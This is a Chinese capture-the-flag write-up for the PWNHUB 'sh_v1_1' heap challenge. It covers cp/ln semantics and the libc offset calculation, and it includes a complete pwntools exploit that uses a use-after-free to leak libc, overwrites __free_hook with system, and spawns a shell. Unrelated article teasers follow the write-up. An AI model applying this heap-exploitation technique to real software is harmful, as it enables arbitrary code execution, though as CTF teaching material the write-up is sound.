2023 PWNHUB 3月赛-【sh_v1_1】(cp ln unsorted bin 与main_arena的偏移 思路 exp)

文章目录

  • 无关干扰
  • cp
  • ln
  • unsorted bin 与main_arena的偏移
  • 思路
  • exp

无关干扰

这段代码总是重复,但没啥用,我们可以将全部代码复制到vscode后然后将这些部分全部去除掉

if ( dword_A010 > dword_A014 )dword_A018 ^= dword_A020;if ( dword_A010 < dword_A020 || dword_A014 > dword_A010 )dword_A018 += dword_A020;if ( dword_A024 < dword_A020 || dword_A01C > dword_A010 )// ********{dword_A014 = dword_A020 * dword_A010;if ( dword_A010 != dword_A020 * dword_A010 || dword_A01C != dword_A014 || dword_A01C > dword_A024 ){dword_A018 ^= dword_A020;dword_A018 += dword_A020;dword_A014 = dword_A020 * dword_A010;if ( dword_A010 > dword_A020 * dword_A010 )dword_A018 ^= dword_A020;if ( dword_A010 < dword_A020 || dword_A014 > dword_A010 )dword_A018 += dword_A020;if ( dword_A024 < dword_A020 || dword_A01C > dword_A010 )dword_A014 = dword_A020 * dword_A010;}}if ( dword_A010 != dword_A014 || dword_A01C != dword_A014 || dword_A01C > dword_A024 )// ********{dword_A018 ^= dword_A020;dword_A018 += dword_A020;dword_A014 = dword_A020 * dword_A010;if ( dword_A010 > dword_A020 * dword_A010 )dword_A018 ^= dword_A020;if ( dword_A010 < dword_A020 || dword_A014 > dword_A010 )dword_A018 += dword_A020;if ( dword_A024 < dword_A020 || dword_A01C > dword_A010 )dword_A014 = dword_A020 * dword_A010;}

cp

cp [选项] 源文件 目标文件

ln

ln [参数] 链接源 链接目标其中,链接源指的是被链接文件或目录的路径,链接目标指的是所要创建的链接文件的路径。常用参数: -s 或 --symbolic:创建符号链接(软链接),默认情况下创建的是硬链接。 -f 或 --force:若目标文件或目录已存在,则先删除再创建链接。
  1. 创建硬链接: 假设当前目录下存在一个文件名为file.txt,使用以下命令创建一个硬链接名为link.txt:
ln file.txt link.txt
  1. 通过这个命令,我们创建了一个硬链接link.txt,它与原始文件file.txt共享相同的inode和数据块。即使我们删除原始文件file.txt,link.txt仍然存在,并且可以继续访问其内容。
    创建符号链接(软链接): 假设当前目录下存在一个文件名为file.txt,使用以下命令创建一个符号链接名为link.txt:
ln -s file.txt link.txt

通过这个命令,我们创建了一个符号链接link.txt,它是一个特殊类型的文件,其中包含了对原始文件file.txt的路径引用。如果我们删除原始文件file.txt,link.txt将无法访问到原始文件的内容,因为它只是一个指向路径的引用。

  • 硬链接和符号链接的区别:
  • (1) 硬链接与原始文件共享相同的inode和数据块,它们在文件系统中被视为同一个文件。而符号链接是一个特殊类型的文件,它包含了对原始文件的路径引用。
  • (2) 硬链接与原始文件的修改是相互影响的,即使通过硬链接也可以修改原始文件内容。而符号链接只是指向原始文件的一个引用,对符号链接的修改不会影响原始文件。
  • (3) 如果原始文件被删除,硬链接仍然可以继续访问,并且不会丢失数据,因为硬链接与原始文件共享相同的inode和数据块。而删除原始文件会导致符号链接无法访问原始文件的内容。

unsorted bin 与main_arena的偏移

malloc_hook 位于main_arena 上方0x10 的位置
main_arena+96=unsorted bin
main_arena-0x10=__malloc_hook
__malloc_hook=unsorted bin-0x10-96

思路

存在UAF和double free,

  1. 先堆满tcachebin
  2. 然后再释放一个进入unsorted bin再通过UAF泄露libc地址
  3. 然后得到对应版本,得到版本是3.31(根据版本判断使用什么方法)
  4. 然后利用UAF修改刚刚进入的tcachebin的fd为free_hook的地址,
  5. malloc两次后得到chunk并修改free_hook的值,
  6. 最后构造好/bin/sh然后free即可getshell

exp

#!/usr/bin/env python3from pwn import *exe = ELF("./pwn")
libc = ELF("./libc-2.31.so")
ld = ELF("./ld-2.31.so")s=process("./pwn")def touch(file,content):s.sendlineafter(b">>>>",b"touch "+file)s.sendline(content)
def ln(src,des):s.sendlineafter(b">>>>",b"ln "+src+b" "+des)s.sendline("ikun")
def rm(file):s.sendlineafter(b">>>>",b"rm "+file)def cat(file):s.sendlineafter(b">>>>",b"cat "+file)def gedit(file,content):s.sendlineafter(b">>>>",b"gedit "+file)s.sendline(content)gdb.attach(s,"b main")def main():touch(b"1",b"123")touch(b"2",b"123")touch(b"3",b"123")touch(b"4",b"123")touch(b"5",b"123")touch(b"6",b"123")touch(b"7",b"123")touch(b"8",b"123")touch(b"gap",b"123")ln(b"7",b"9")ln(b"8",b"10")rm(b"1")rm(b"2")rm(b"3")rm(b"4")rm(b"5")rm(b"6")rm(b"7")rm(b"8")cat(b"10")s.recvuntil(b">>>>>>>>")unsorted_bin_addr=int.from_bytes(s.recvline()[:-1].ljust(8,b"\x00"),"little")print("unsorted_bin_addr ",hex(unsorted_bin_addr))libc_base=unsorted_bin_addr-96-0x10-libc.sym["__malloc_hook"]free_hook=libc.sym["__free_hook"]+libc_basegedit(b"9",p64(free_hook))touch(b"11",b"/bin/sh")system=libc.sym["system"]+libc_basetouch(b"12",p64(system))rm(b"11")s.interactive()if __name__ == "__main__":main()

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/540744.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

python疑难杂症(12)---生成器、迭代器的基本概念、以及他们之间的关系区别

Python的迭代器和生成器是其量大特色法器&#xff0c;常常用于简化代码、降低数据占用内存提高运行速度上&#xff0c;学会这两件法器&#xff0c;使用Python语言也可以猪鼻子插大葱了。 1、迭代器 在Python中&#xff0c;迭代器是要求支持迭代器协议的对象&#xff0c;而支持…

使用SpaceDesk实现iPad成为电脑拓展屏(保姆级教程)

使用SpaceDesk实现iPad成为电脑拓展屏 SpaceDesk是一个开源的软件, 所以说对学生和平民用户非常的友好, 连接后的画质也非常不错, 而且具有无线和有线两种连接方式. 接下来就开始教程: 1. 安装SpaceDesk电脑版 首先我们要下载SpaceDesk电脑版安装好: SpaceDesk官网 注意: …

FreeRTOS 临界段代码保护及调度器挂起与恢复

1. 临界段代码保护简介 1. 临界段 什么是临界段&#xff1a;临界段代码也叫做临界区&#xff0c;是指那些必须完整运行&#xff0c;不能被打断的代码段。 适用场合如&#xff1a; 外设&#xff1a;需严格按照时序初始化的外设&#xff1a;IIC、SPI等等 IIC 初始化有个几微秒…

Android 录屏操作

Android 录屏操作 本文主要介绍android中如何通过MediaRecorder实现录屏操作的. 1: 申请权限 <uses-permission android:name"android.permission.RECORD_AUDIO" /> <uses-permission android:name"android.permission.WRITE_EXTERNAL_STORAGE"…

Vue.js+SpringBoot开发校园疫情防控管理系统

目录 一、摘要1.1 项目介绍1.2 项目录屏 二、功能模块2.1 学生2.2 老师2.3 学校管理部门 三、系统展示四、核心代码4.1 新增健康情况上报4.2 查询健康咨询4.3 新增离返校申请4.4 查询防疫物资4.5 查询防控宣传数据 五、免责说明 一、摘要 1.1 项目介绍 基于JAVAVueSpringBoot…

系统之家精心打造:游戏专用Win10系统,畅玩游戏无阻碍!

现在很多玩家都会在电脑上畅玩游戏&#xff0c;所以电脑系统是非常重要的。系统之家精心打造的游戏专用Win10系统&#xff0c;是为游戏爱好者量身定制&#xff0c;经过严格的优化&#xff0c;确保游戏运行时更加流畅。选择系统之家的游戏专用Win10系统&#xff0c;让您的游戏体…

德人合科技|办公电脑文件资料防泄密软件

#天锐绿盾# 办公电脑文件资料防泄密软件通常具备以下几个关键功能来保障公司敏感信息的安全&#xff1a; PC端&#xff1a; https://isite.baidu.com/site/wjz012xr/2eae091d-1b97-4276-90bc-6757c5dfedee 1. 文件透明加密&#xff1a; 这是此类软件的核心功能之一&#xff…

永热爱 敢向前 | Paraverse平行云的2023 年终总结

永热爱&#xff0c;敢向前 值此新年&#xff0c;回顾2023&#xff0c;仅以此句&#xff0c;献给所有XR产业信仰者 2023 年&#xff0c;是XR产业技术和场景承上启下的关键之年 在这场波澜壮阔的技术潮中 「Paraverse平行云」踏浪前行 已是第八个年头&#xff0c;让我们一起…

代码随想录day20(2)二叉树:完全二叉树节点个数(leetcode222)

题目要求&#xff1a;求一个完全二叉树的节点个数 思路&#xff1a;首先完全二叉树可以用普通二叉树的方法来求&#xff0c;但是需要遍历所有的节点。 但是对于完全二叉树来说&#xff0c;只有最底层右侧的节点可能没满&#xff0c;其余每层节点都达到了最大值。所以我们可以…

Docker 安装部署MySQL教程

前言 Docker安装MySQL镜像以及启动容器&#xff0c;大致都是三步&#xff1a;查询镜像–>拉取镜像–>启动容器 1、查询镜像 docker search mysql2、拉取镜像 拉取镜像时选择stars值较高的 docker pull mysql:5.7 #这里指定拉取对应的版本Mysql5.7&#xff0c;没有指…

git撤回多个push到远程仓库的commit

第一种方案&#xff0c;reset会删掉你远程仓库的commit&#xff0c;不会保留删掉的历史 //ls_origin改成你自己设定的 remote origin 名称&#xff0c;然后把 ls_branch 换成你的 branch 名字 git reflog show remotes/ls_origin/ls_branch找出上一次的commit的hash值是哪个&a…

Kubernetes operator系列:webhook 知识学习

云原生学习路线导航页&#xff08;持续更新中&#xff09; 本文是 Kubernetes operator学习 系列文章&#xff0c;本节会对 kubernetes webhook 知识进行学习 本文的所有代码&#xff0c;都存储于github代码库&#xff1a;https://github.com/graham924/share-code-operator-st…